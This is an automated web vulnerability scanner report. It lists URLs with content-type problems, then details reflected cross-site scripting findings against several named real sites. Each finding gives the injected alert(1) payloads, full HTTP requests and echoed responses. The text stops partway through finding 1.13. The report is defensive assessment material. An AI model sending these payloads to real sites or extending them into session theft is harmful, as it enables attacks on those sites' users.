18.215. http://www.contentverification.com/logos/index_files/login_online_banking_bottom.gif

18.216. http://www.contentverification.com/logos/login.html

18.217. http://www.contentverification.com/logos/logo.html

18.218. http://www.contentverification.com/logos/thirdparty.html

18.219. http://www.contentverification.com/man-in-the-middle/index.html

18.220. http://www.contentverification.com/obfuscation-attacks/idn.html

18.221. http://www.contentverification.com/obfuscation-attacks/index.html

18.222. http://www.contentverification.com/partners/index.html

18.223. http://www.contentverification.com/phishing/index.html

18.224. http://www.contentverification.com/phishing/quiz/index.html

18.225. http://www.contentverification.com/products/certificates.html

18.226. http://www.contentverification.com/products/download.html

18.227. http://www.contentverification.com/products/instantssl.html

18.228. http://www.contentverification.com/resources/avoid.html

18.229. http://www.contentverification.com/resources/index.html

18.230. http://www.contentverification.com/resources/portfolio.html

18.231. http://www.contentverification.com/support/faqs.html

18.232. http://www.contentverification.com/support/index.html

18.233. http://www.contentverification.com/support/vengine_help.html

18.234. http://www.creativedevelopment.com/

18.235. http://www.enterprisessl.com/G/essl/ssl-cert-prodt-sslpage-elitesslbuynow_btn/addsupport-ssl-elitessl

18.236. http://www.enterprisessl.com/G/essl/ssl-cert-prodt-sslpage-evmdcbuynow_btn/addsupport-ssl-evmdcpage

18.237. http://www.enterprisessl.com/G/essl/ssl-cert-prodt-sslpage-evsgcbuynow_btn/addsupport-ssl-evsslpage

18.238. http://www.enterprisessl.com/G/essl/ssl-cert-prodt-sslpage-evsslbuynow_btn/addsupport-ssl-evsslpage

18.239. http://www.enterprisessl.com/G/essl/ssl-cert-prodt-sslpage-goldsslbuynow_btn/addsupport-ssl-goldssl

18.240. http://www.enterprisessl.com/G/essl/ssl-cert-prodt-sslpage-platinumsslbuynow_btn/addsupport-ssl-platinumssl

18.241. http://www.enterprisessl.com/G/essl/ssl-cert-prodt-sslpage-platinumsslsgcbuynow_btn/addsupport-ssl-sgc

18.242. http://www.enterprisessl.com/G/essl/ssl-cert-prodt-sslpage-platinumsslsgcwilcardlbuynow_btn/addsupport-ssl-sgcwildcard

18.243. http://www.enterprisessl.com/G/essl/ssl-cert-prodt-sslpage-platinumsslwildcard_btn/addsupport-platinumssl_wildcard

18.244. http://www.enterprisessl.com/G/essl/ssl-cert-prodt-sslpage-uccbuynow_btn/sslcertificate-ucc

18.245. http://www.enterprisessl.com/images/style/splashbg.jpg

18.246. http://www.enterprisessl.com/ssl-certificate-images/sqlist.gif

18.247. http://www.enterprisessl.com/ssl-certificate-products/addsupport/ev.html

18.248. http://www.enterprisessl.com/ssl-certificate-products/addsupport/gb.html

18.249. http://www.enterprisessl.com/ssl-certificate-products/addsupport/hg.html

18.250. http://www.enterprisessl.com/ssl-certificate-products/addsupport/hp.html

18.251. http://www.enterprisessl.com/ssl-certificate-products/evssl/ssl-certificate-joi.html

18.252. http://www.pfoa.com/can-consumers-reduce-exposure-to-PFOA.html

18.253. http://www.seeos.com/

18.254. http://www.seeos.com/tg.php

18.255. http://www.trustix.com/

18.256. http://www.trustix.com/contacts/

18.257. http://www.trustix.com/corporate/

18.258. http://www.trustix.com/corporate/legal.html

18.259. http://www.trustix.com/corporate/privacy_statement.html

18.260. http://www.trustix.com/corporate/terms_of_use.html

18.261. http://www.trustix.com/free_trials/index.html

18.262. http://www.trustix.com/home/

18.263. http://www.trustix.com/index.html

18.264. http://www.trustix.com/login.html

18.265. http://www.trustix.com/medium/

18.266. http://www.trustix.com/news/index.html

18.267. http://www.trustix.com/organizations/

18.268. http://www.trustix.com/partners/index.html

18.269. http://www.trustix.com/products/content_filtering.html

18.270. http://www.trustix.com/products/remote_user.html

18.271. http://www.trustix.com/purchase/index.html

18.272. http://www.trustix.com/resellers/index.html

18.273. http://www.trustix.com/small/

18.274. http://www.trustix.com/small/index.html

18.275. http://www.trustix.com/support/index.html

18.276. http://www.vengine.com/G/comodoproducts-cdrom_index/VE-products_indexpage/getvengineoncd_btn

18.277. http://www.vengine.com/G/comodoproducts-cdromindex/VE-indexpage/getvengineoncd_btn

18.278. http://www.vengine.com/G/enterprisessl_sslpage/VE-freetools/ordersslnow_btn

18.279. http://www.vengine.com/G/venginedownload-exe/VE-products_indexpage/downloadvengineforfree_btn

18.280. http://www.vengine.com/G/vengineproducts-index/VE-indexpage/downloadnow-freeforever_btn

18.281. http://www.vengine.com/G/vengineproducts-index/VE-indexpage/downloadvengineforfree_btn

18.282. http://www.vengine.com/G/vengineproducts-tour/VE-indexpage/taketour_btn

18.283. http://www.vengine.com/G/vengineuserguide-pdf/VE-indexpage/userguidedownload_btn

18.284. http://www.vengine.com/g/Comodo-emailcertpage/VE-freetools/moreinfo_btn

18.285. http://www.vengine.com/g/HG-getfreescanlicense/VE-freetools/signupfreescanning_btn

18.286. http://www.vengine.com/g/InstantSSL-freeemailcertpage/VE-freetools/freeemailcert_btn

19. Content type incorrectly stated

19.1. http://a1.twimg.com/profile_images/527575506/faabo_01_normal.gif

19.2. http://a2.twimg.com/profile_images/1523992292/internetfirewall_normal.png

19.3. https://accounts.comodo.com/cfp/management/terms

19.4. https://cert.webtrust.org/SealFile

19.5. https://cert.webtrust.org/ViewSeal

19.6. http://depot.activalive.com/app/deployment.php

19.7. http://depot.activalive.com/favicon.ico

19.8. http://display.digitalriver.com/

19.9. http://docs.govinfosecurity.com/files/images_articles/4067_artid_4067.jpg

19.10. http://enterprise.comodo.com/internal/security-solutions/authentication-identity-assurance/two-factor/demo-form.php

19.11. http://forums.comodo.com/comodorss.php

19.12. http://j2global.tt.omtrdc.net/m2/j2global/mbox/standard

19.13. http://now.eloqua.com/visitor/v200/svrGP.aspx

19.14. http://secure.comodo.com/products/guessregion

19.15. https://secure.trustfax.com/doccorpweb/ajax/signupAjax.jsp

19.16. http://www.clicktale.com/res/2/img/button_left.png

19.17. http://www.clicktale.com/res/2/img/button_left_hover.png

19.18. http://www.clicktale.com/res/2/img/button_right.png

19.19. http://www.clicktale.com/res/2/img/button_right_hover.png

19.20. http://www.comodo.com/ttb_searcher/!ML_MANAGE

19.21. http://www.govinfosecurity.com/favicon.ico

19.22. http://www.internaldosimetry.com/images/title.gif

19.23. https://www.panopticsecurity.com/favicon.ico

19.24. http://www.parallels.com/r/css/import.css

19.25. http://www.trustfax.com/trustfax-cms-public/dms/trustfax/resources/images/TrustFax_slogan.gif

20. Content type is not specified



1. Cross-site scripting (reflected)  next
There are 48 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://antivirus.comodo.com/antivirus_download.php [af parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /antivirus_download.php

Issue detail

The value of the af request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a558"%20style%3dx%3aexpression(alert(1))%205e0a080bf20 was submitted in the af parameter. This input was echoed as 2a558\" style=x:expression(alert(1)) 5e0a080bf20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /antivirus_download.php?af=11652a558"%20style%3dx%3aexpression(alert(1))%205e0a080bf20 HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:04:25 GMT
Content-Type: text/html
Connection: close
Content-Length: 21233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimiz
...[SNIP]...
<meta http-equiv="Refresh" Content = "1; URL=http://download.comodo.com/cis/download/installs/1000/partners/cav_installer_11652a558\" style=x:expression(alert(1)) 5e0a080bf20.exe"/>
...[SNIP]...

1.2. http://antivirus.comodo.com/antivirus_download.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /antivirus_download.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc9a6"%20style%3dx%3aexpression(alert(1))%20e6a77e2098a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dc9a6\" style=x:expression(alert(1)) e6a77e2098a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /antivirus_download.php?af=/dc9a6"%20style%3dx%3aexpression(alert(1))%20e6a77e2098a1165 HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:04:31 GMT
Content-Type: text/html
Connection: close
Content-Length: 21235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimiz
...[SNIP]...
<meta http-equiv="Refresh" Content = "1; URL=http://download.comodo.com/cis/download/installs/1000/partners/cav_installer_/dc9a6\" style=x:expression(alert(1)) e6a77e2098a1165.exe"/>
...[SNIP]...

1.3. http://antivirus.comodo.com/cis-pro_download.php [af parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /cis-pro_download.php

Issue detail

The value of the af request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b08e"%20style%3dx%3aexpression(alert(1))%2046bb6f5d8d2 was submitted in the af parameter. This input was echoed as 2b08e\" style=x:expression(alert(1)) 46bb6f5d8d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /cis-pro_download.php?af=11642b08e"%20style%3dx%3aexpression(alert(1))%2046bb6f5d8d2 HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:04:29 GMT
Content-Type: text/html
Connection: close
Content-Length: 28859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimiz
...[SNIP]...
<meta http-equiv="Refresh" Content = "1; URL=http://download.comodo.com/cis/download/installs/1000/partners/cispro_30day_installer_11642b08e\" style=x:expression(alert(1)) 46bb6f5d8d2.exe"/>
...[SNIP]...

1.4. http://antivirus.comodo.com/cis-pro_download.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /cis-pro_download.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5250f"%20style%3dx%3aexpression(alert(1))%207056823230 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5250f\" style=x:expression(alert(1)) 7056823230 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /cis-pro_download.php?af=/5250f"%20style%3dx%3aexpression(alert(1))%2070568232301164 HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:04:51 GMT
Content-Type: text/html
Connection: close
Content-Length: 28859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimiz
...[SNIP]...
<meta http-equiv="Refresh" Content = "1; URL=http://download.comodo.com/cis/download/installs/1000/partners/cispro_30day_installer_/5250f\" style=x:expression(alert(1)) 70568232301164.exe"/>
...[SNIP]...

1.5. https://cert.webtrust.org/SealFile [seal parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cert.webtrust.org
Path:   /SealFile

Issue detail

The value of the seal request parameter is copied into the HTML document as plain text between tags. The payload bc2da<script>alert(1)</script>cd9dd7288d3 was submitted in the seal parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /SealFile?seal=1082bc2da<script>alert(1)</script>cd9dd7288d3&file=pdf HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://cert.webtrust.org/ViewSeal?id=1082

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 18 Sep 2011 09:40:08 GMT
Content-Type: text/html
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Length: 3699

<html><head><title>Apache Tomcat/4.0.6 - Error report</title><STYLE><!--H1{font-family : sans-serif,Arial,Tahoma;color : white;background-color : #0086b2;} BODY{font-family : sans-serif,Arial,Tahoma;c
...[SNIP]...
<pre>java.lang.NumberFormatException: For input string: "1082bc2da<script>alert(1)</script>cd9dd7288d3"
   at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48)
   at java.lang.Integer.parseInt(Integer.java:435)
   at java.lang.Integer.parseInt(Integer.java:476)
   at ca.cica.servlet
...[SNIP]...

1.6. https://cert.webtrust.org/ViewSeal [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cert.webtrust.org
Path:   /ViewSeal

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 54a6b<script>alert(1)</script>313790a0b05 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ViewSeal?id=108254a6b<script>alert(1)</script>313790a0b05 HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.comodo.com/

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 09:40:03 GMT
Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector)
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Type: text/html
Content-Length: 2977

java.lang.NumberFormatException: For input string: "108254a6b<script>alert(1)</script>313790a0b05"
   at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48)
   at java.lang.Integer.parseInt(Integer.java:435)
   at java.lang.Integer.parseInt(Integer.java:476)
   at ca.cica.servlet
...[SNIP]...

1.7. http://depot.activalive.com/app/deployment.php [d[] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://depot.activalive.com
Path:   /app/deployment.php

Issue detail

The value of the d[] request parameter is copied into the HTML document as plain text between tags. The payload c8276<script>alert(1)</script>a430c58d40f was submitted in the d[] parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/deployment.php?id=6024&ptid=6024-1f8f8598c-d89e-453d-897a-4200ff97bc91&stid=1f8f8598c-d89e-453d-897a-4200ff97bc91&oref=http%253A%252F%252Fhome.j2.com%252Fenterprise%252Fenterprise.html&chat=null&r=0.3873252209741622&d[]=5365c8276<script>alert(1)</script>a430c58d40f&b[]=14918 HTTP/1.1
Host: depot.activalive.com
Proxy-Connection: keep-alive
Referer: http://www.fusemail.com/products/email-archiving/request-more-information/?utm_source=j2&utm_medium=crosssell&utm_campaign=enterprisepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.13
Content-Length: 228
Connection: close
Content-Type: text/javascript;charset=iso-8859-1

_alc.monitoring.push(5365);
_alc.__setStartDeptStatus(5365c8276<script>alert(1)</script>a430c58d40f, false);
_alc.__setStartDeptStatus(5365, false);
_alc.monitoringOff = true;
_alc.deployment_id = 6024;
_alc.license_id = 10869;

1.8. http://display.digitalriver.com/ [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f583'-alert(1)-'56f1fd3f0b6 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=2441f583'-alert(1)-'56f1fd3f0b6&tax=par HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/products/hsphere/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:41:06 GMT
Server: Apache/2.2.9
Expires: Sun, 18 Sep 2011 12:11:06 GMT
Last-Modified: Sun, 18 Sep 2011 11:41:06 GMT
Content-Length: 226
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=2441f583'-alert(1)-'56f1fd3f0b6&tax=par';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.9. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a236'-alert(1)-'a4f07a80042 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=par&2a236'-alert(1)-'a4f07a80042=1 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/products/hsphere/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:41:07 GMT
Server: Apache/2.2.9
Expires: Sun, 18 Sep 2011 12:11:07 GMT
Last-Modified: Sun, 18 Sep 2011 11:41:07 GMT
Content-Length: 229
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=par&2a236'-alert(1)-'a4f07a80042=1';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.10. http://display.digitalriver.com/ [tax parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ebc8'-alert(1)-'3a457381f57 was submitted in the tax parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=par8ebc8'-alert(1)-'3a457381f57 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/products/hsphere/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:41:06 GMT
Server: Apache/2.2.9
Expires: Sun, 18 Sep 2011 12:11:06 GMT
Last-Modified: Sun, 18 Sep 2011 11:41:06 GMT
Content-Length: 226
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=par8ebc8'-alert(1)-'3a457381f57';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.11. http://j2global.tt.omtrdc.net/m2/j2global/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j2global.tt.omtrdc.net
Path:   /m2/j2global/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 20938<script>alert(1)</script>a8a3b940bd4 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/j2global/mbox/standard?mboxHost=www.trustfax.com&mboxSession=1316364084200-226831&mboxPage=1316364084200-226831&screenHeight=1200&screenWidth=1920&browserWidth=1097&browserHeight=869&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=TF_xs_adClick_globalfooter20938<script>alert(1)</script>a8a3b940bd4&mboxId=0&mboxTime=1316346084298&mboxURL=http%3A%2F%2Fwww.trustfax.com%2F&mboxReferrer=http%3A%2F%2Fwww.vengine.com%2Fproducts%2Fprove_it.html&mboxVersion=39 HTTP/1.1
Host: j2global.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.trustfax.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 222
Date: Sun, 18 Sep 2011 11:41:24 GMT
Server: Test & Target

mboxFactories.get('default').get('TF_xs_adClick_globalfooter20938<script>alert(1)</script>a8a3b940bd4',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1316364084200-226831.19");

1.12. https://secure.comodo.com/home/purchase.php [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.comodo.com
Path:   /home/purchase.php

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5cb8"%20style%3dx%3aexpression(alert(1))%20f1eaf6a60d7 was submitted in the pid parameter. This input was echoed as c5cb8\" style=x:expression(alert(1)) f1eaf6a60d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /home/purchase.php?pid=9c5cb8"%20style%3dx%3aexpression(alert(1))%20f1eaf6a60d7&utm_source=pfw_fd&utm_medium=buy_free_download&af=1144&utm_campaign=PF_CIS_BUY_FD HTTP/1.1
Host: secure.comodo.com
Connection: keep-alive
Referer: http://personalfirewall.comodo.com/free-download.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1315419552319r0.6822604623157531; kvcd=1316328651224; km_ai=nxNThomVDaBwwqN7xx0NPXpwd58%3D; km_vs=1; km_lv=1316328651; km_uq=; optimizelyCustomEvents=%7B%228018129%22%3A%5B%22Need%20a%20pc%20expert%20try%20it%20now%20button%22%5D%7D; optimizelyBuckets=%7B%228015120%22%3A8013305%2C%228022314%22%3A8017411%7D; __utma=1.355449779.1315419555.1315419555.1315419555.1; __utmb=1.4.10.1316328649; __utmc=1; __utmz=1.1315419555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)|utmctr=comodo

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 01:51:42 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 43034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script src="//cdn.opti
...[SNIP]...
<a href="includes/video.php?pid=9c5cb8\" style=x:expression(alert(1)) f1eaf6a60d7" id="video">
...[SNIP]...

1.13. https://secure.instantssl.com/products/SSLIdASignup1a [loginErrorMessage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.instantssl.com
Path:   /products/SSLIdASignup1a

Issue detail

The value of the loginErrorMessage request parameter is copied into the HTML document as plain text between tags. The payload 16f0f<script>alert(1)</script>780d4eeba57afd885 was submitted in the loginErrorMessage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

